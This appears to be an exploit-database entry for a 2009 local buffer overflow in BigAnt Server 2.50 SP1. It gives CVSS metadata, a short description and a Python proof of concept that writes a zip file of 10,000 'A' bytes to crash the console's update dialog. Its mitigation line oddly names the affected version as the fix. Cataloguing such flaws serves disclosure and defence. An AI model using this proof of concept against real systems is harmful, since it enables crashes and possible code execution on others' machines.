header-logo
Suggest Exploit
vendor:
BigAnt Server
by:
Dr_IDE
9.3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: BigAnt Server
Affected Version From: 2.50 SP1
Affected Version To: 2.50 SP1
Patch Exists: YES
Related CWE: N/A
CPE: a:bigantsoft:bigant_server:2.50_sp1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

BigAnt Server 2.50 SP1 Local Buffer Overflow PoC

BigAnt Server 2.50 SP1 is vulnerable to a local buffer overflow vulnerability. This vulnerability can be exploited by an attacker to execute arbitrary code on the vulnerable system. The attacker needs to open the BigAnt Console, go to the Update option, and browse to a specially crafted zip file. This will cause a buffer overflow and allow the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of BigAnt Server 2.50 SP1 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/env python

#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()

# milw0rm.com [2009-09-16]

Navigation

Suggest Exploit

Services By CQR